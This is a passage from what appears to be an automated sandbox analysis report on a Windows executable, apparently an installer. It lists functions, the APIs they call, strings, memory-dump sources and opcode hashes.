                                                                                                                                                                          • SystemTimeToVariantTime.OLEAUT32(?,?), ref: 00436EC7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$Time_memset$FileFreeH_prolog3_NameTemp$AllocLocalModulePathSystemVariant__wtof_l
                                                                                                                                                                          • String ID: ExpireDate$HsG$Startup
                                                                                                                                                                          • API String ID: 2576575598-4025281889
                                                                                                                                                                          • Opcode ID: d1ac7a3dd998a3fed13e8993fb3abad4c9f7527ab2fc52fa3d58a9a321862882
                                                                                                                                                                          • Instruction ID: 1cc14bca14ab8cdbea8164c3b06a1067a6e85e7ae6b1b4347218a8399ac6f31e
                                                                                                                                                                          • Opcode Fuzzy Hash: d1ac7a3dd998a3fed13e8993fb3abad4c9f7527ab2fc52fa3d58a9a321862882
                                                                                                                                                                          • Instruction Fuzzy Hash: D52181B1D00218EFCB01EFE0CD45ADDBBB8EF08304F60805AE505BB195E7789649CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401410, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67registrylibraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040144B
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000), ref: 00401484
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00401497
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                                                                          • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                          • API String ID: 823179699-3913318428
                                                                                                                                                                          • Opcode ID: 9c5d06a007987859836c688bc3a724d62c85b94a5b43c17d2ab1ced68ff20ed6
                                                                                                                                                                          • Instruction ID: 28ff499bec34f0898057e999838990759897ec0990054c38c35c0d945c7637a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c5d06a007987859836c688bc3a724d62c85b94a5b43c17d2ab1ced68ff20ed6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C119071600205FFEB208F55CC48F6BB7A9EB44711F20803AF949AB2B0D7B9D940DB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004150E1, Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,00000001,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A), ref: 004150F7
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 00415107
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00000001,?,0041786D,?,?,00000005,00000080,00416E27,00000402,?,00416E3A,?), ref: 0041511D
                                                                                                                                                                          • _memset.LIBCMT ref: 0041513E
                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,utils.cpp,?,00000001,000008A4,0043FC6E,?,00000000), ref: 0041514A
                                                                                                                                                                          • _memmove.LIBCMT ref: 00415153
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00415166
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$Exception@8FindLoadLockSizeofThrow_memmove_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3510561357-0
                                                                                                                                                                          • Opcode ID: 3b86da8d9d14287b4bc96f88f38cdf07f7f0b9052eee2f0d039c92b8b384c454
                                                                                                                                                                          • Instruction ID: 4d2d8dc3edbe497332fbfdf9013b980bc7efc4292ec0e8cdae9a8fa0d8438462
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b86da8d9d14287b4bc96f88f38cdf07f7f0b9052eee2f0d039c92b8b384c454
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D010471500B05BBEB222F21EC45F977F6EEB84794F00443EFA0895222DB75C8808668
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041BBB6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 53COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                                          • String ID: /removeonly$reboot$removeasmajorupgrade$runas$runfromtemp
                                                                                                                                                                          • API String ID: 1038674560-2163775701
                                                                                                                                                                          • Opcode ID: 21cb6c82f6b099d0fff45b3db1863684f022ac0d031aab3329a0a9a6c0b7ef04
                                                                                                                                                                          • Instruction ID: 4b1f0e7bad81f6d28d9fdb14035485bb697c1f8fbec907bf99468651087c75b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 21cb6c82f6b099d0fff45b3db1863684f022ac0d031aab3329a0a9a6c0b7ef04
                                                                                                                                                                          • Instruction Fuzzy Hash: EC01813138C70238B6156B255DA2FFB1249CE0179D7B4406FB919B05C2EB4CDEC294AE
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440DFF, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00440E2C
                                                                                                                                                                          • _memset.LIBCMT ref: 00440E4C
                                                                                                                                                                          • wsprintfW.USER32 ref: 00440E64
                                                                                                                                                                            • Part of subcall function 0043F50C: __EH_prolog3_GS.LIBCMT ref: 0043F516
                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00440E7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatFreeH_prolog3_LocalMessage_memsetwsprintf
                                                                                                                                                                          • String ID: $jG$%s %s
                                                                                                                                                                          • API String ID: 1431993970-213347874
                                                                                                                                                                          • Opcode ID: bb65509c4c414d9e026785f56b3a0584d4a6cdb32b72b43ea566541a56a18306
                                                                                                                                                                          • Instruction ID: d72b2d0749c07a7a1fad2937cb8441a8d4a452bdfe9ed9daaf3d6a7851d5b3c4
                                                                                                                                                                          • Opcode Fuzzy Hash: bb65509c4c414d9e026785f56b3a0584d4a6cdb32b72b43ea566541a56a18306
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A015275900118BADB60AFA5CC09EDF7BFCFF49704F0040AAB549E2151DE349A89CFA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004155AF, Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 004155B6
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0041576F), ref: 004155D3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004155E0
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004155FA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041560D
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00415632
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00415646
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 746121330-0
                                                                                                                                                                          • Opcode ID: 9a13373675f47005e7df3f2470c7c590d7b6347179ca03a7867f3c5839bd0c71
                                                                                                                                                                          • Instruction ID: 51b7835df31c1f5d96a14ce7357e699eb6ada25b27359b4e68efd17be01d3a15
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a13373675f47005e7df3f2470c7c590d7b6347179ca03a7867f3c5839bd0c71
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B110430900640CFDB11DF68C988A58BBF1FF04314F59C49DE999AB266C7B5E904DB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041564E, Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415655
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0041578E), ref: 00415672
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0041567F
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00415699
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004156AC
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004156D1
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004156E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 746121330-0
                                                                                                                                                                          • Opcode ID: 1f3f4583d16c4629b735d462e41cdc53c9b2c721044bd4caa17fcf5f8ade77a3
                                                                                                                                                                          • Instruction ID: db8608bf25cbde5bbcfc2047566ee4b781b9a3fb600c4e2a4237ad6da8b17e9f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f3f4583d16c4629b735d462e41cdc53c9b2c721044bd4caa17fcf5f8ade77a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11D434900640CFDB11DF68C988A58BBF1FF04314F59C59DE999AB266C7B5E904DB18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415CD0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415CD7
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00416220,?,00000000,00000004,004166C1,?,00000001), ref: 00415CFB
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00415D2C
                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00415D50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: ec0d61531b32181e74508d6c40cb29c044a4de5f789a18cd9ac17a0aaa5bd4a1
                                                                                                                                                                          • Instruction ID: 9e7455ceeed0943b77a4ed3ed8ffec7b2254be637fce5cfc9610fe2e9be2ac8e
                                                                                                                                                                          • Opcode Fuzzy Hash: ec0d61531b32181e74508d6c40cb29c044a4de5f789a18cd9ac17a0aaa5bd4a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 81111574904240CFCB04EF59C989789BBB1BF04319F45C0AAED099F2A7C7B8DA44CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040B509, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0040B512
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040B520
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040B537
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: KERNEL32$SetDllDirectoryW$SetSearchPathMode
                                                                                                                                                                          • API String ID: 667068680-4129897381
                                                                                                                                                                          • Opcode ID: dbca5a1e264295a750feb4126b20dab2ad72129a36170f7438690a5b26ff53ad
                                                                                                                                                                          • Instruction ID: c2897d3eb4502c17e6208073a17fde5e2fbbc6a626daba68eb5e81178ce9b57e
                                                                                                                                                                          • Opcode Fuzzy Hash: dbca5a1e264295a750feb4126b20dab2ad72129a36170f7438690a5b26ff53ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0EC71342B253FA6202BB46C49AAE254DDA45B663624476B40CE1281DBA98E4446AD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004312AE, Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004330D0: __EH_prolog3.LIBCMT ref: 004330D7
                                                                                                                                                                            • Part of subcall function 004330D0: lstrcmpiW.KERNEL32(?,00000000,0043133A,?,?,?,CC858012,?,?,?,?,?,0046C010,000000FF), ref: 0043314E
                                                                                                                                                                          • CharNextW.USER32(?), ref: 004313FB
                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00431418
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$H_prolog3lstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1581910369-0
                                                                                                                                                                          • Opcode ID: 5b0779d5db4df0feaae4564c6fc6ee4d78a0f04948b150473b0cab08deff2d9f
                                                                                                                                                                          • Instruction ID: 9787e126a82dfed7ee43eb5a99be9458abed55ca0fe481fe3ed0c1529d7b467f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b0779d5db4df0feaae4564c6fc6ee4d78a0f04948b150473b0cab08deff2d9f
                                                                                                                                                                          • Instruction Fuzzy Hash: D8A1B171D00228DBDB24DF64CD4A9EDB7B9EB28314F1550EBE609A32A0D7384E95CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043D68F, Relevance: 9.2, APIs: 6, Instructions: 177fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043D696
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0043D610: __EH_prolog3.LIBCMT ref: 0043D617
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0043D743
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043D751
                                                                                                                                                                          • _memset.LIBCMT ref: 0043D76D
                                                                                                                                                                            • Part of subcall function 0043E772: SetFilePointer.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,0043DDC5,00000000,?,00000000,00000000), ref: 0043E792
                                                                                                                                                                            • Part of subcall function 0043E772: GetLastError.KERNEL32(?,?,?,?,0043DDC5,00000000,?,00000000,00000000), ref: 0043E79A
                                                                                                                                                                          • ReadFile.KERNEL32(0000002E,?,0000002E,?,00000000,?,?,00000000,00000000,00000044,0043EBF5,?), ref: 0043D79F
                                                                                                                                                                            • Part of subcall function 0043DA40: __EH_prolog3_GS.LIBCMT ref: 0043DA47
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000002E,?,00000000,?,?,00000000,00000000,?), ref: 0043D816
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLast$H_prolog3_Read$CreateH_prolog3Pointer_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1186803598-0
                                                                                                                                                                          • Opcode ID: 55f213d2c7f091f9e21503ba9f0a47860d33e4234e9d285482907097a69b8e42
                                                                                                                                                                          • Instruction ID: d3b3e88c8e7036922bfe6c6a93a85262c25a1b65a80592ab03b925fdf97b8f1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 55f213d2c7f091f9e21503ba9f0a47860d33e4234e9d285482907097a69b8e42
                                                                                                                                                                          • Instruction Fuzzy Hash: 0961AEB0900240DBDB28EF65ED85B9A3BB8EF08704F10206EE9119A2C6D7B9D945CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042B798, Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
